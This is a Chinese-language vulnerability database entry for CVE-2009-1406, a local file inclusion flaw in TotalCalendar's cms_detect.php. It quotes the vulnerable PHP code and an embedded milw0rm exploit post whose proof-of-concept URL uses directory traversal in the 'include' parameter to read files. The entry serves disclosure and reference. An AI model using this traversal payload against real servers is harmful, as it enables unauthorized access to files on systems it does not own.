Sweetphp TotalCalendar 'cms_detect.php'本地文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117631 漏洞类型 路径遍历
发布时间 2009-04-21 更新时间 2009-06-15
CVE编号 CVE-2009-1406 CNNVD-ID CNNVD-200904-475
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/8503
https://cxsecurity.com/issue/WLB-2009040232
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-475
|漏洞详情
TotalCalendar是一种基于Web的日程管理系统。TotalCalendar的cms_detect.php模块没有正确地验证对include参数所传送的输入便用于包含文件,远程攻击者可以通过目录遍历攻击包含本地资源的任意文件。以下是cms_detect.php中的有漏洞代码段:-------------------------------------------------------------------------------Line26:$include=isset($_REQUEST['include'])?$_REQUEST['include']:null;Line115:if(!empty($include))require_once($inc_dir.$include);-------------------------------------------------------------------------------
|漏洞EXP
##########################################################################################
[+] TotalCalendar 2.4 (include) Local File Inclusion
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
##########################################################################################

[+] Local File Inclusion

Vulnerable code in cms_detect.php:

-------------------------------------------------------------------------------
Line 26 : $include = isset($_REQUEST['include']) ? $_REQUEST['include'] : null;
Line 115 : if(!empty($include)) require_once($inc_dir.$include);
-------------------------------------------------------------------------------

  PoC :

   http://127.0.0.1/[path]/cms_detect.php?include=../../../../../../BOOTSECT.BAK

##########################################################################################

# milw0rm.com [2009-04-21]
|参考资料

来源:XF
名称:totalcalendar-cmsdetect-file-include(49980)
链接:http://xforce.iss.net/xforce/xfdb/49980
来源:BID
名称:34634
链接:http://www.securityfocus.com/bid/34634
来源:MILW0RM
名称:8503
链接:http://www.milw0rm.com/exploits/8503
来源:SECUNIA
名称:34824
链接:http://secunia.com/advisories/34824